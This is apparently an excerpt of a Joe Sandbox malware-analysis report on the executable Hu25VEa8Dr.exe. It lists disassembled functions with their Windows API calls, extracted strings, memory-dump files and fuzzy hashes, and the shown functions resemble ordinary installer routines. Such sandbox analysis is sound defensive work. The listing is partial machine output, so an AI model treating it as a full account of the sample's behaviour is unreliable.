DestroyWindow.USER32 ref: 00403958
SetWindowLongA.USER32(?,00000000,00000000), ref: 00403974
GetDlgItem.USER32(?,?), ref: 00403995
SendMessageA.USER32 ref: 004039A9
IsWindowEnabled.USER32(00000000), ref: 004039B0
GetDlgItem.USER32(?,00000001), ref: 00403A5E
GetDlgItem.USER32(?,00000002), ref: 00403A68
SetClassLongA.USER32(?,000000F2,?), ref: 00403A82
SendMessageA.USER32 ref: 00403AD3
GetDlgItem.USER32(?,00000003), ref: 00403B79
ShowWindow.USER32(00000000,?), ref: 00403B9A
EnableWindow.USER32(?,?), ref: 00403BAC
EnableWindow.USER32(?,?), ref: 00403BC7
GetSystemMenu.USER32 ref: 00403BDD
EnableMenuItem.USER32 ref: 00403BE4
SendMessageA.USER32 ref: 00403BFC
SendMessageA.USER32 ref: 00403C0F
lstrlenA.KERNEL32(00429FE0,?,00429FE0,0042E360), ref: 00403C38
SetWindowTextA.USER32(?,00429FE0), ref: 00403C47
ShowWindow.USER32(?,0000000A), ref: 00403D7B

Memory Dump Source

Source File: 00000000.00000002.341136687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.341120489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341168948.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341265956.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Hu25VEa8Dr.jbxd

Similarity

API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
String ID:
API String ID: 184305955-0
Opcode ID: 0b6e4c35b8dcfffa61f252a23bc82b09b6935cd656e84c2cc0fc3574caf64574
Instruction ID: 552f9e5d3371f53337095c5be2d86efa37a563823f2766eb5c4291c6ef6876bd
Opcode Fuzzy Hash: 0b6e4c35b8dcfffa61f252a23bc82b09b6935cd656e84c2cc0fc3574caf64574
Instruction Fuzzy Hash: B8C1B171604204AFD721AF62ED85E2B7F6CEB44706F40053EF941B51E1C779A942DB2E

Uniqueness

Uniqueness Score: -1.00%

Function 00403555 Relevance: 47.5, APIs: 15, Strings: 12, Instructions: 216stringregistrylibraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00405D2E: GetModuleHandleA.KERNEL32(?,?,00000000,0040313D,00000008), ref: 00405D40
Part of subcall function 00405D2E: LoadLibraryA.KERNEL32(?), ref: 00405D4B
Part of subcall function 00405D2E: GetProcAddress.KERNEL32(00000000,?,?,00000000,0040313D,00000008), ref: 00405D5C

lstrcatA.KERNEL32(1033,00429FE0,80000001,Control Panel\Desktop\ResourceLocale,00000000,00429FE0,00000000,00000006,"C:\Users\user\Desktop\Hu25VEa8Dr.exe",00000000,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004035C6
lstrlenA.KERNEL32(hjgjhad,?,?,?,hjgjhad,00000000,00434400,1033,00429FE0,80000001,Control Panel\Desktop\ResourceLocale,00000000,00429FE0,00000000,00000006,"C:\Users\user\Desktop\Hu25VEa8Dr.exe"), ref: 0040363B
lstrcmpiA.KERNEL32(?,.exe,hjgjhad,?,?,?,hjgjhad,00000000,00434400,1033,00429FE0,80000001,Control Panel\Desktop\ResourceLocale,00000000,00429FE0,00000000), ref: 0040364E
GetFileAttributesA.KERNEL32(hjgjhad), ref: 00403659
LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,00434400), ref: 004036A2

Part of subcall function 0040596A: wsprintfA.USER32 ref: 00405977

RegisterClassA.USER32 ref: 004036E9
SystemParametersInfoA.USER32(00000030,00000000,_Nb,00000000), ref: 00403701
CreateWindowExA.USER32 ref: 0040373A
ShowWindow.USER32(00000005,00000000), ref: 00403770
LoadLibraryA.KERNEL32(RichEd20), ref: 00403781
LoadLibraryA.KERNEL32(RichEd32), ref: 0040378C
GetClassInfoA.USER32(00000000,RichEdit20A,0042E300), ref: 0040379C
GetClassInfoA.USER32(00000000,RichEdit,0042E300), ref: 004037A9
RegisterClassA.USER32(0042E300), ref: 004037B2
DialogBoxParamA.USER32 ref: 004037D1

Strings

RichEd32, xrefs: 00403787
.exe, xrefs: 00403648
1033, xrefs: 00403575, 004035C1
Control Panel\Desktop\ResourceLocale, xrefs: 00403589
C:\Users\user\AppData\Local\Temp\, xrefs: 00403559
hjgjhad, xrefs: 00403609, 00403611, 0040361E, 00403668, 0040366E
RichEdit20A, xrefs: 00403794, 0040379A
RichEdit, xrefs: 004037A3
RichEd20, xrefs: 0040377C
_Nb, xrefs: 004036F8, 004036FD
.DEFAULT\Control Panel\International, xrefs: 004035B1
"C:\Users\user\Desktop\Hu25VEa8Dr.exe", xrefs: 00403561

Memory Dump Source

Source File: 00000000.00000002.341136687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.341120489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341168948.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341265956.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Hu25VEa8Dr.jbxd

Similarity

API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: "C:\Users\user\Desktop\Hu25VEa8Dr.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb$hjgjhad
API String ID: 914957316-3666124790
Opcode ID: 3a2c45f0d62c5ae26582f53126e34280adb3cccee4e3bf9508370ae987846fa1
Instruction ID: af9374935d7a54fd1dce6881c110e57d7cc589bc1fe1380e1b33b637fa7f222c
Opcode Fuzzy Hash: 3a2c45f0d62c5ae26582f53126e34280adb3cccee4e3bf9508370ae987846fa1
Instruction Fuzzy Hash: E161C571604204BAD220AF669D85F273EACE744759F40447FF941B22E1D779AD028B3E

Uniqueness

Uniqueness Score: -1.00%

Function 00403F06 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 204windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 00403F91
GetDlgItem.USER32(00000000,000003E8), ref: 00403FA5
SendMessageA.USER32 ref: 00403FC3
GetSysColor.USER32 ref: 00403FD4
SendMessageA.USER32 ref: 00403FE3
SendMessageA.USER32 ref: 00403FF2
lstrlenA.KERNEL32(?), ref: 00403FFC
SendMessageA.USER32 ref: 0040400A
SendMessageA.USER32 ref: 00404019
GetDlgItem.USER32(?,0000040A), ref: 0040407C
SendMessageA.USER32 ref: 0040407F
GetDlgItem.USER32(?,000003E8), ref: 004040AA
SendMessageA.USER32 ref: 004040EA
LoadCursorA.USER32 ref: 004040F9
SetCursor.USER32(00000000), ref: 00404102
ShellExecuteA.SHELL32(0000070B,open,0042DB00,00000000,00000000,00000001), ref: 00404115
LoadCursorA.USER32 ref: 00404122
SetCursor.USER32(00000000), ref: 00404125
SendMessageA.USER32 ref: 00404151
SendMessageA.USER32 ref: 00404165

Strings

open, xrefs: 0040410D
hjgjhad, xrefs: 004040D5
N, xrefs: 00404098

Memory Dump Source

Source File: 00000000.00000002.341136687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.341120489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341168948.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341265956.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Hu25VEa8Dr.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
String ID: N$hjgjhad$open
API String ID: 3615053054-1121083075
Opcode ID: ca9ac3b64147b6f3934cc3f9d65700a8f1bf1296ace46b7c3bfa8303cb2a33ee
Instruction ID: 0605a8af88f24b8a239437e517aaa265f180be2417519ff34b25117700073a86
Opcode Fuzzy Hash: ca9ac3b64147b6f3934cc3f9d65700a8f1bf1296ace46b7c3bfa8303cb2a33ee
Instruction Fuzzy Hash: D161C1B1A40209BBEB109F60DD45F6A3B69FF54715F108036FB01BA2D1C7B8A991CF98

Uniqueness

Uniqueness Score: -1.00%

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32 ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32 ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectA.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextA.USER32(00000000,0042E360,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000000.00000002.341136687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.341120489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341168948.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341265956.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Hu25VEa8Dr.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: 3029600e7a8438bcc5a7b1f7b0fc9c629607e2b31f65c15310fafe19c7710355
Instruction ID: 226a36137513f208ef2a020474f107b038e547e09bed9ebbc09fe29577f91b00
Opcode Fuzzy Hash: 3029600e7a8438bcc5a7b1f7b0fc9c629607e2b31f65c15310fafe19c7710355
Instruction Fuzzy Hash: C0419B71804249AFCF058FA5CD459BFBFB9FF44314F00812AF952AA1A0C738AA51DFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0040575A Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 144filememoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00405D2E: GetModuleHandleA.KERNEL32(?,?,00000000,0040313D,00000008), ref: 00405D40
Part of subcall function 00405D2E: LoadLibraryA.KERNEL32(?), ref: 00405D4B
Part of subcall function 00405D2E: GetProcAddress.KERNEL32(00000000,?,?,00000000,0040313D,00000008), ref: 00405D5C

CloseHandle.KERNEL32(00000000), ref: 004057A7
GetShortPathNameA.KERNEL32 ref: 004057B0
GetShortPathNameA.KERNEL32 ref: 004057CD
wsprintfA.USER32 ref: 004057EB
GetFileSize.KERNEL32(00000000,00000000,0042BBE8,C0000000,00000004,0042BBE8,?,?,?,00000000,000000F1,?), ref: 00405826
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,00000000,000000F1,?), ref: 00405835
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0040584B
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,0042B7E8,00000000,-0000000A,00409330,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405891
WriteFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 004058A3
GlobalFree.KERNEL32(00000000), ref: 004058AA
CloseHandle.KERNEL32(00000000), ref: 004058B1

Part of subcall function 00405658: lstrlenA.KERNEL32(00000000,?,00000000,00000000,00405866,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040565F
Part of subcall function 00405658: lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,00405866,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040568F

Strings

%s=%s, xrefs: 004057E1
[Rename], xrefs: 0040585B, 0040586D

Memory Dump Source

Source File: 00000000.00000002.341136687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.341120489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341168948.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341265956.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Hu25VEa8Dr.jbxd

Similarity

API ID: File$Handle$CloseGlobalNamePathShortlstrlen$AddressAllocFreeLibraryLoadModulePointerProcReadSizeWritewsprintf
String ID: %s=%s$[Rename]
API String ID: 3772915668-1727408572
Opcode ID: 6cb39701302fa091149022549eefa5da3c0be633e3a468fc33eaceea222ec053
Instruction ID: 426fb2abaf3c2c6495405564ff4e517f65c757b77f6bed08917e1be6c8ffeb7f
Opcode Fuzzy Hash: 6cb39701302fa091149022549eefa5da3c0be633e3a468fc33eaceea222ec053
Instruction Fuzzy Hash: 6341FF32606B15ABE3206B619C49F6B3A5CDF80705F004436FD05F62C2E678E8118EBD

Uniqueness

Uniqueness Score: -1.00%

Function 00405C6E Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON

Download Yara Rule

APIs

CharNextA.USER32(?), ref: 00405CC6
CharNextA.USER32(?), ref: 00405CD3
CharNextA.USER32(?), ref: 00405CD8
CharPrevA.USER32(?,?), ref: 00405CE8

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405C6F, 00405CAA
*?|<>/":, xrefs: 00405CB6
"C:\Users\user\Desktop\Hu25VEa8Dr.exe", xrefs: 00405C74

Memory Dump Source

Source File: 00000000.00000002.341136687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.341120489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341168948.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341265956.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Hu25VEa8Dr.jbxd

Similarity

API ID: Char$Next$Prev
String ID: "C:\Users\user\Desktop\Hu25VEa8Dr.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
API String ID: 589700163-906959726
Opcode ID: 5aa71b13a4eda0142438c40892e2bf660e792717ed83394db4a483eb7dc85cb7
Instruction ID: 3b67653c5ee308ebbdbeafcda2e7905df7fa5ba98b11233f7c0ae47683edab57
Opcode Fuzzy Hash: 5aa71b13a4eda0142438c40892e2bf660e792717ed83394db4a483eb7dc85cb7
Instruction Fuzzy Hash: 0811905180CB912EFB3206245D44BB7BF89CB567A0F58447BE9C5B22C2CA7C5C429A6D

Uniqueness

Uniqueness Score: -1.00%

Function 00403E25 Relevance: 12.1, APIs: 8, Instructions: 61COMMON

Download Yara Rule

APIs

GetWindowLongA.USER32(?,000000EB), ref: 00403E42
GetSysColor.USER32 ref: 00403E5E
SetTextColor.GDI32(?,00000000), ref: 00403E6A
SetBkMode.GDI32(?,?), ref: 00403E76
GetSysColor.USER32 ref: 00403E89
SetBkColor.GDI32(?,?), ref: 00403E99
DeleteObject.GDI32(?), ref: 00403EB3
CreateBrushIndirect.GDI32(?), ref: 00403EBD

Memory Dump Source

Source File: 00000000.00000002.341136687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.341120489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341168948.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341265956.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Hu25VEa8Dr.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: 54c4c26d0880f537c7164b4e2121e342b47f232b14c6c2566c024284623f766e
Instruction ID: df06335cf3b4afc37a3544ae2d30c5d34a8579c70edf0d6bae8496df32602c64
Opcode Fuzzy Hash: 54c4c26d0880f537c7164b4e2121e342b47f232b14c6c2566c024284623f766e
Instruction Fuzzy Hash: DC219671904709ABCB219F78DD08B4B7FF8AF00715F048A29F855E22E0D338E904CB95

Uniqueness

Uniqueness Score: -1.00%

Function 0040267C Relevance: 10.6, APIs: 7, Instructions: 89memoryfileCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 004026D0
GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,000000F0), ref: 004026EC
GlobalFree.KERNEL32(?), ref: 00402725
WriteFile.KERNEL32(FFFFFD66,00000000,?,FFFFFD66), ref: 00402737
GlobalFree.KERNEL32(00000000), ref: 0040273E
CloseHandle.KERNEL32(FFFFFD66), ref: 00402756
DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 0040276A

Memory Dump Source

Source File: 00000000.00000002.341136687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.341120489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341168948.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341265956.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Hu25VEa8Dr.jbxd

Similarity

API ID: Global$AllocFileFree$CloseDeleteHandleWrite
String ID:
API String ID: 3294113728-0
Opcode ID: 127149d4f0cce16dfe4a3af1efdcab4b76b2a353eb8979ce4d539156ac24bc73
Instruction ID: 62f2159171fbc9033078dd1539b67ba065abfcd1800d5973976be9d0b9eda31e
Opcode Fuzzy Hash: 127149d4f0cce16dfe4a3af1efdcab4b76b2a353eb8979ce4d539156ac24bc73
Instruction Fuzzy Hash: DE319F71C00128BBDF216FA5CD89EAE7E78EF04364F10422AF524772E0C7795D419BA9

Uniqueness

Uniqueness Score: -1.00%

Function 00404DAA Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(004297B8,00000000,0041DB88,756F110C,?,?,?,?,?,?,?,?,?,00402FB6,00000000,?), ref: 00404DE3
lstrlenA.KERNEL32(00402FB6,004297B8,00000000,0041DB88,756F110C,?,?,?,?,?,?,?,?,?,00402FB6,00000000), ref: 00404DF3
lstrcatA.KERNEL32(004297B8,00402FB6,00402FB6,004297B8,00000000,0041DB88,756F110C), ref: 00404E06
SetWindowTextA.USER32(004297B8,004297B8), ref: 00404E18
SendMessageA.USER32 ref: 00404E3E
SendMessageA.USER32 ref: 00404E58
SendMessageA.USER32 ref: 00404E66

Memory Dump Source

Source File: 00000000.00000002.341136687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.341120489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341168948.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341265956.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Hu25VEa8Dr.jbxd

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID:
API String ID: 2531174081-0
Opcode ID: 50dbff66748b602f0133f4c5fc9f36e40697bbb7724bf87a113127d5fb299ab7
Instruction ID: 64f14355eea1465708e63b557f2fc924fecf56a011f776fb8de10cf69f9f2b8c
Opcode Fuzzy Hash: 50dbff66748b602f0133f4c5fc9f36e40697bbb7724bf87a113127d5fb299ab7
Instruction Fuzzy Hash: F7216071A00118BBDB119FA9DD85ADEBFA9FF44354F14807AF904B6290C7398E418F98

Uniqueness

Uniqueness Score: -1.00%

Function 00404679 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32 ref: 00404694
GetMessagePos.USER32 ref: 0040469C
ScreenToClient.USER32(?,?), ref: 004046B6
SendMessageA.USER32 ref: 004046C8
SendMessageA.USER32 ref: 004046EE

Strings

f, xrefs: 004046CA

Memory Dump Source

Source File: 00000000.00000002.341136687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.341120489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341168948.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341265956.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Hu25VEa8Dr.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: 2a5698d5089c35727aab5c3c5da7bcfb0b51a0b1d2cb1bbeaafe9db8233e3477
Instruction ID: b5388fb2048f9adb4f66bcd81e9da03b2d8faafec29f08353259a6dacb87349b
Opcode Fuzzy Hash: 2a5698d5089c35727aab5c3c5da7bcfb0b51a0b1d2cb1bbeaafe9db8233e3477
Instruction Fuzzy Hash: 0E014071D00219BADB00DB94DC45BEEBBB8AB59711F10016ABA11B61C0D7B865418BA5

Uniqueness

Uniqueness Score: -1.00%

Function 00402B3B Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B56
MulDiv.KERNEL32 ref: 00402B81
wsprintfA.USER32 ref: 00402B91
SetWindowTextA.USER32(?,?), ref: 00402BA1
SetDlgItemTextA.USER32(?,00000406,?), ref: 00402BB3

Strings

verifying installer: %d%%, xrefs: 00402B8B

Memory Dump Source

Source File: 00000000.00000002.341136687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.341120489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341168948.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341177429.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.341265956.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Hu25VEa8Dr.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: fb9d5c419c19e2bdb6c378f6819b1ebc1dc21d5e7d0f0b4f2b85ce684f360012
Instruction ID: 3d98ddf4d84b742d5460afe4edfb6d9be597fa80bf04213b3bc288f28cb5f5da
Opcode Fuzzy Hash: fb9d5c419c19e2bdb6c378f6819b1ebc1dc21d5e7d0f0b4f2b85ce684f360012
Instruction Fuzzy Hash: 82014470A40209ABDB209F60DD09FAE3779BB04345F008039FA06A92D1D7B8AA558F99

Uniqueness

Uniqueness Score: -1.00%

Function 00401F51 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(00000000,00000001,000000F0), ref: 00401F7C

Part of subcall function 00404DAA: lstrlenA.KERNEL32(004297B8,00000000,0041DB88,756F110C,?,?,?,?,?,?,?,?,?,00402FB6,00000000,?), ref: 00404DE3
Part of subcall function 00404DAA: lstrlenA.KERNEL32(00402FB6,004297B8,00000000,0041DB88,756F110C,?,?,?,?,?,?,?,?,?,00402FB6,00000000), ref: 00404DF3
Part of subcall function 00404DAA: lstrcatA.KERNEL32(004297B8,00402FB6,00402FB6,004297B8,00000000,0041DB88,756F110C), ref: 00404E06
Part of subcall function 00404DAA: SetWindowTextA.USER32(004297B8,004297B8), ref: 00404E18
